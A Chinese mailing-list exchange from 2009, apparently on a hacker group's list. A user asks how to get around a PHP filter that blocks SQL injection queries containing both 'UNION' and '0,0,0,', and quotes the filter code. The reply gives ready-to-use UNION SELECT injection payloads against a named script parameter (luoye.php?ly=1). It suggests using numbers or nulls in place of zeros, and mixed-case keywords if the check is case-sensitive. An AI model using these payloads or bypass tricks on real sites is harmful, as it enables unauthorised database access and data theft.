luoye.php?ly=1 union select 1,2,3,4,5,6,7,...............
luoye.php?ly=1 union select null,null,null,null,null,null,null,.............. 不要 luoye.php?ly=1 union select 0,0,0,0,0,0,0,........ 如果stristr()为strstr() UNion select 0,0,0,0,0,0,0,0.........也行 On 3月22日, 下午11时31分, "ecore.ishacker" <[email protected]> wrote: > ph4nt0m: > 您好! 哪位大牛知道,如果在注入中突破php对一些注入关健字的检测。 > > 我现在就碰到了一个注入点,结果union关健字被过滤了。 > > function query($query, $nocache=false) { > > if(!fixbug("nosql")) { > > if(fixbug("sqldebug")) { > > echo "mysql_query($query)<br />"; > > } > > if(!fixbug("nosqlsecurity")) { > > if(stristr($query, "DROP") && stristr($query, "DATABASE")) { > > ob_end_clean(); > > die("SQL Error: Security risk."); > > } > > if(stristr($query, "UNION") && stristr($query, "0,0,0,")) { > > ob_end_clean(); > > die("SQL Error: Security risk."); > > } > > } > > if (!($result = mysql_query($query))) { > > ob_end_clean(); > > die("SQL Error: ".mysql_error()."<br /> Query: $query<br />"); > > } > > $this->querycount++; > > $this->querylist.="<br />$query"; > > // print_r(mysql_fetch_array($result)); > > return $result; > > } > > } > > 2009-03-22 > > 、 --~--~---------~--~----~------------~-------~--~----~ 要向邮件组发送邮件,请发到 [email protected] 要退订此邮件,请发邮件至 [email protected] -~----------~----~----~----~------~----~------~--~---
